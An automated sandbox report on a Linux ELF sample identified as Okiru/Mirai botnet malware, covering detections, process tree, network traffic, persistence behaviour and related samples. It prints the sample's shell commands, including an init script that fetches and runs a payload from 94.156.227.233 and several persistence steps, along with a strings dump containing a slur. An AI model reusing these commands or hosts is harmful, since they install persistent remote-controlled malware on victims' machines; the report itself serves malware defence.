Edit tour

Linux Analysis Report
sh4.nn.elf

Overview

General Information

Sample name:	sh4.nn.elf
Analysis ID:	1580236
MD5:	d777594dc50b802dbfd3490e1c765795
SHA1:	90244b7951fa3e6409885edaacf6d1692c47e668
SHA256:	0c462c6fa35031cbb936f59e7e53c3e40bd3aec80cb8af1ecddc53778063c351
Tags:	elfuser-abuse_ch
Infos:

Detection

Okiru

Score:	84
Range:	0 - 100
Whitelisted:	false

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Yara detected Okiru

Drops files in suspicious directories

Sample deletes itself

Sample tries to persist itself using /etc/profile

Sample tries to persist itself using System V runlevels

Sample tries to set files in /etc globally writable

Detected TCP or UDP traffic on non-standard ports

Enumerates processes within the "proc" file system

Executes commands using a shell command-line interpreter

Executes the "chmod" command used to modify permissions

Executes the "mkdir" command used to create folders

Executes the "systemctl" command used for controlling the systemd system and service manager

Found strings indicative of a multi-platform dropper

Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable

Sample has stripped symbol table

Sample listens on a socket

Sample tries to set the executable flag

Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)

Uses the "uname" system call to query kernel version information (possible evasion)

Writes shell script file to disk with an unusual file extension

Classification

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1580236
Start date and time:	2024-12-24 05:42:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 4m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultlinuxfilecookbook.jbs
Analysis system description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:	default
Sample name:	sh4.nn.elf
Detection:	MAL
Classification:	mal84.spre.troj.evad.linELF@0/10@0/0

Runtime Messages

Command:	/tmp/sh4.nn.elf
PID:	6233
Exit Code:	139
Exit Code Info:	SIGSEGV (11) Segmentation fault invalid memory reference
Killed:	False
Standard Output:
Standard Error:	qemu: uncaught target signal 11 (Segmentation fault) - core dumped

Process Tree

system is lnxubuntu20

sh4.nn.elf (PID: 6233, Parent: 6159, MD5: 8943e5f8f8c280467b4472c15ae93ba9) Arguments: /tmp/sh4.nn.elf

sh4.nn.elf New Fork (PID: 6250, Parent: 6233)

sh (PID: 6250, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "systemctl enable custom.service >/dev/null 2>&1"

sh New Fork (PID: 6259, Parent: 6250)

systemctl (PID: 6259, Parent: 6250, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable custom.service

sh4.nn.elf New Fork (PID: 6287, Parent: 6233)

sh (PID: 6287, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"

sh New Fork (PID: 6289, Parent: 6287)

chmod (PID: 6289, Parent: 6287, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/system

sh4.nn.elf New Fork (PID: 6290, Parent: 6233)

sh (PID: 6290, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"

sh New Fork (PID: 6295, Parent: 6290)

ln (PID: 6295, Parent: 6290, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/system /etc/rcS.d/S99system

sh4.nn.elf New Fork (PID: 6296, Parent: 6233)

sh (PID: 6296, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf"

sh4.nn.elf New Fork (PID: 6298, Parent: 6233)

sh (PID: 6298, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6300, Parent: 6298)

chmod (PID: 6300, Parent: 6298, MD5: 739483b900c045ae1374d6f53a86a279) Arguments: chmod +x /etc/init.d/sh4.nn.elf

sh4.nn.elf New Fork (PID: 6301, Parent: 6233)

sh (PID: 6301, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"

sh New Fork (PID: 6303, Parent: 6301)

mkdir (PID: 6303, Parent: 6301, MD5: 088c9d1df5a28ed16c726eca15964cb7) Arguments: mkdir -p /etc/rc.d

sh4.nn.elf New Fork (PID: 6304, Parent: 6233)

sh (PID: 6304, Parent: 6233, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1"

sh New Fork (PID: 6306, Parent: 6304)

ln (PID: 6306, Parent: 6304, MD5: e933cf05571f62c0157d4e2dfcaea282) Arguments: ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf

sh4.nn.elf New Fork (PID: 6307, Parent: 6233)

sh4.nn.elf New Fork (PID: 6309, Parent: 6307)

sh4.nn.elf New Fork (PID: 6311, Parent: 6307)

udisksd New Fork (PID: 6244, Parent: 799)

dumpe2fs (PID: 6244, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

systemd New Fork (PID: 6274, Parent: 6273)

snapd-env-generator (PID: 6274, Parent: 6273, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator

udisksd New Fork (PID: 6320, Parent: 799)

dumpe2fs (PID: 6320, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6356, Parent: 799)

dumpe2fs (PID: 6356, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

udisksd New Fork (PID: 6377, Parent: 799)

dumpe2fs (PID: 6377, Parent: 799, MD5: 5c66f7d8f7681a40562cf049ad4b72b4) Arguments: dumpe2fs -h /dev/dm-0

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
sh4.nn.elf	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
6233.1.00007f43c0400000.00007f43c0414000.r-x.sdmp	JoeSecurity_Okiru	Yara detected Okiru	Joe Security
Process Memory Space: sh4.nn.elf PID: 6233	JoeSecurity_Okiru	Yara detected Okiru	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: sh4.nn.elf

Avira: detected

Multi AV Scanner detection for submitted file

Source: sh4.nn.elf

ReversingLabs: Detection: 31%

Source: sh4.nn.elf

String: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd/*/usr/sbin/*/usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd**deamon*/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/bin/busybox/usr/lib/systemd/systemdshellvar/run/home/Davincisshwatchdog/var/spool/var/Sofiasshd/usr/compress/bin//compress/bin/compress/usr//root/dvr_gui//root/dvr_app//anko-app//opt/ping/pswiresharkechotcpdumpnetstatpythoniptablesnanonvimvimgdbpkillkillallapt/bin/loginnfstftpftpmalloc[start_pid_hopping] Failed to clone: %s

Source: global traffic

TCP traffic: 192.168.2.23:60008 -> 94.156.227.234:38242

Source: /tmp/sh4.nn.elf (PID: 6233)

Socket: 0.0.0.0:38242

Jump to behavior

Source: global traffic	TCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
Source: global traffic	TCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
Source: global traffic	TCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80

Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.227.234

Source: sh4.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, sh4.nn.elf.32.dr, custom.service.12.dr	String found in binary or memory: http://94.156.227.233/
Source: sh4.nn.elf	String found in binary or memory: http://94.156.227.233/oro1vk

Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 42836 -> 443

Source: Initial sample	String containing 'busybox' found: /bin/busybox
Source: Initial sample	String containing 'busybox' found: getinfo xxxTSource Engine QueryNIGGERNIGGERGETCOURRPERTEDDDDDDDDDDHAHAHAHAHAHAAHAHAHHAHAMDWHO??wasHeERe.BIGDADDYCATISURDAD!/proc/self/exe(deleted)/proc/%s/exe/proc/...%s/%s/data/local/tmp//var/run/home/usr/bin/var/tmptmpfs/tmp/ttsize=10M/tmp/tt/system/proc/%d/proc/proc/%u/statusrPPid:/proc/%u/cmdline-bash-sh/bin/sh94.156.227.234locked Process: PID=%d, Bot-ID:%sFound And Killed Process: PID=%d, Realpath=%s, Bot-ID:%s2surf2/proc/%d/exe/proc/%d/cmdlinewgetcurlunknown%s (URL: %s)/./fd/socket/proc/%d/mountinfo/ /proc-altered/usr/lib/systemd//usr/sbin//usr/sbin/agetty/usr/sbin/cron/usr/lib/policykit-1/polkitd/snap/snapd/15534/usr/lib/snapd/snapd/usr/bin/dbus-daemon/usr/lib/openssh/sftp-server-sshd*deamon/usr/libexec/openssh/sftp-server/opt/app/monitor/z/secom//usr/lib/usr/mnt/sys/bin/boot/media/srv/sbin/lib/etc/dev/telnetbashhttpdtelnetddropbearropbearencoder/var/tmp/wlancontwlancontarm.nnarm5.nnarm6.nnm68k.nnmips.nnmipsel.nnpowerpc.nnsparc.nnx86_32.nnx86_64.nntelnet.nn/init/opt/app/var/Challengeapp/hi3511gmDVR

Source: ELF static info symbol of initial sample

.symtab present: no

Source: classification engine

Classification label: mal84.spre.troj.evad.linELF@0/10@0/0

Persistence and Installation Behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/sh4.nn.elf (PID: 6233)

File: /etc/profile

Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/sh4.nn.elf (PID: 6233)	File: /etc/rc.local	Jump to behavior
Source: /usr/bin/ln (PID: 6295)	File: /etc/rcS.d/S99system -> /etc/init.d/system	Jump to behavior
Source: /usr/bin/ln (PID: 6306)	File: /etc/rc.d/S99sh4.nn.elf -> /etc/init.d/sh4.nn.elf	Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/sh4.nn.elf (PID: 6233)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6289)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6300)	File: /etc/init.d/sh4.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6064/cmdline	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6377/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6421/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6420/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6423/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6356/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6422/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/799/cmdline	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6425/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6424/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6405/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6427/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6426/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6407/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6406/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6428/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6409/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6408/status	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6311)	File opened: /proc/6419/status	Jump to behavior

Source: /tmp/sh4.nn.elf (PID: 6250)	Shell command executed: sh -c "systemctl enable custom.service >/dev/null 2>&1"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6287)	Shell command executed: sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6290)	Shell command executed: sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6296)	Shell command executed: sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6298)	Shell command executed: sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6301)	Shell command executed: sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"	Jump to behavior
Source: /tmp/sh4.nn.elf (PID: 6304)	Shell command executed: sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1"	Jump to behavior

Source: /bin/sh (PID: 6289)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/system			Jump to behavior
Source: /bin/sh (PID: 6300)	Chmod executable: /usr/bin/chmod -> chmod +x /etc/init.d/sh4.nn.elf			Jump to behavior

Source: /bin/sh (PID: 6303)

Mkdir executable: /usr/bin/mkdir -> mkdir -p /etc/rc.d

Jump to behavior

Source: /bin/sh (PID: 6259)

Systemctl executable: /usr/bin/systemctl -> systemctl enable custom.service

Jump to behavior

Source: /tmp/sh4.nn.elf (PID: 6233)	File: /etc/rc.local (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6289)	File: /etc/init.d/system (bits: - usr: rx grp: rx all: rwx)	Jump to behavior
Source: /usr/bin/chmod (PID: 6300)	File: /etc/init.d/sh4.nn.elf (bits: - usr: rx grp: rx all: rwx)	Jump to behavior

Source: /tmp/sh4.nn.elf (PID: 6233)	Writes shell script file to disk with an unusual file extension: /etc/init.d/system	Jump to dropped file
Source: /tmp/sh4.nn.elf (PID: 6233)	Writes shell script file to disk with an unusual file extension: /etc/rc.local	Jump to dropped file
Source: /bin/sh (PID: 6296)	Writes shell script file to disk with an unusual file extension: /etc/init.d/sh4.nn.elf	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Drops files in suspicious directories

Source: /tmp/sh4.nn.elf (PID: 6233)	File: /etc/init.d/system			Jump to dropped file
Source: /bin/sh (PID: 6296)	File: /etc/init.d/sh4.nn.elf			Jump to dropped file

Sample deletes itself

Source: /tmp/sh4.nn.elf (PID: 6309)

File: /tmp/sh4.nn.elf

Jump to behavior

Source: /tmp/sh4.nn.elf (PID: 6233)

Queries kernel information via 'uname':

Jump to behavior

Source: sh4.nn.elf, 6233.1.00007fffcb405000.00007fffcb426000.rw-.sdmp	Binary or memory string: U/tmp/qemu-open.X9LbXv
Source: sh4.nn.elf, 6233.1.000055d5854b2000.000055d585536000.rw-.sdmp	Binary or memory string: U1!/usr/bin/vmtoolsd
Source: sh4.nn.elf, 6233.1.00007fffcb405000.00007fffcb426000.rw-.sdmp	Binary or memory string: /qemu-open.XXXXX
Source: sh4.nn.elf, 6233.1.00007fffcb405000.00007fffcb426000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-sh4
Source: sh4.nn.elf, 6233.1.00007fffcb405000.00007fffcb426000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-sh4/tmp/sh4.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/sh4.nn.elf
Source: sh4.nn.elf, 6233.1.000055d5854b2000.000055d585536000.rw-.sdmp	Binary or memory string: /usr/bin/vmtoolsd
Source: sh4.nn.elf, 6233.1.000055d5854b2000.000055d585536000.rw-.sdmp	Binary or memory string: U5!/etc/qemu-binfmt/sh4
Source: sh4.nn.elf, 6233.1.000055d5854b2000.000055d585536000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/sh4
Source: sh4.nn.elf, 6233.1.00007fffcb405000.00007fffcb426000.rw-.sdmp	Binary or memory string: /tmp/qemu-open.X9LbXv
Source: sh4.nn.elf, 6233.1.00007fffcb405000.00007fffcb426000.rw-.sdmp	Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped
Source: sh4.nn.elf, 6233.1.00007fffcb405000.00007fffcb426000.rw-.sdmp	Binary or memory string: /qemu-open.XXXXXSXPF

Stealing of Sensitive Information

Yara detected Okiru

Source: Yara match	File source: sh4.nn.elf, type: SAMPLE
Source: Yara match	File source: 6233.1.00007f43c0400000.00007f43c0414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sh4.nn.elf PID: 6233, type: MEMORYSTR

Remote Access Functionality

Yara detected Okiru

Source: Yara match	File source: sh4.nn.elf, type: SAMPLE
Source: Yara match	File source: 6233.1.00007f43c0400000.00007f43c0414000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: sh4.nn.elf PID: 6233, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	2 Scripting	Valid Accounts	Windows Management Instrumentation	1 Unix Shell Configuration Modification	1 Unix Shell Configuration Modification	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Data Manipulation
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Systemd Service	1 Systemd Service	2 File and Directory Permissions Modification	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	2 Scripting	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
sh4.nn.elf	32%	ReversingLabs	Linux.Exploit.Mirai
sh4.nn.elf	100%	Avira	EXP/ELF.Mirai.W

Dropped Files

Source	Detection	Scanner	Label	Link
/etc/rc.local	0%	ReversingLabs
/etc/rc.local	0%	Virustotal		Browse

Name	Source	Malicious	Antivirus Detection	Reputation
http://94.156.227.233/oro1vk	sh4.nn.elf	false		high
http://94.156.227.233/	sh4.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, sh4.nn.elf.32.dr, custom.service.12.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
109.202.202.202	unknown	Switzerland	13030	INIT7CH	false
94.156.227.234	unknown	Bulgaria	57463	NETIXBG	false
91.189.91.43	unknown	United Kingdom	41231	CANONICAL-ASGB	false
91.189.91.42	unknown	United Kingdom	41231	CANONICAL-ASGB	false

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
109.202.202.202	kpLwzBouH4.elf	Get hash	malicious	Unknown	Browse	ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
94.156.227.234	arm.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn.elf	Get hash	malicious	Mirai, Okiru	Browse
	powerpc.nn.elf	Get hash	malicious	Okiru	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	arm7.nn-20241224-0051.elf	Get hash	malicious	Mirai, Okiru	Browse
	sparc.nn.elf	Get hash	malicious	Okiru	Browse
	arm5.nn-20241224-0050.elf	Get hash	malicious	Okiru	Browse
	arm.nn-20241224-0050.elf	Get hash	malicious	Okiru	Browse
91.189.91.43	arm.nn.elf	Get hash	malicious	Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse
	nklarm6.elf	Get hash	malicious	Unknown	Browse
	nabarm6.elf	Get hash	malicious	Unknown	Browse
	zerarm6.elf	Get hash	malicious	Unknown	Browse
	armv4eb.elf	Get hash	malicious	Unknown	Browse
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse
	tftp.elf	Get hash	malicious	Unknown	Browse
	bot.sh4.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CANONICAL-ASGB	arm.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	185.125.190.26
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	nklarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	splarm6.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	nabarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	zerppc.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	zerarm5.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	zermips.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	zerm68k.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
CANONICAL-ASGB	arm.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	x86_32.nn.elf	Get hash	malicious	Okiru	Browse	185.125.190.26
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	91.189.91.42
	nklarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	splarm6.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	nabarm6.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
	zerppc.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	zerarm5.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	zermips.elf	Get hash	malicious	Unknown	Browse	185.125.190.26
	zerm68k.elf	Get hash	malicious	Unknown	Browse	91.189.91.42
INIT7CH	arm.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	mipsel.nn.elf	Get hash	malicious	Okiru	Browse	109.202.202.202
	nklarm6.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	nabarm6.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	zerm68k.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
	zerarm6.elf	Get hash	malicious	Unknown	Browse	109.202.202.202
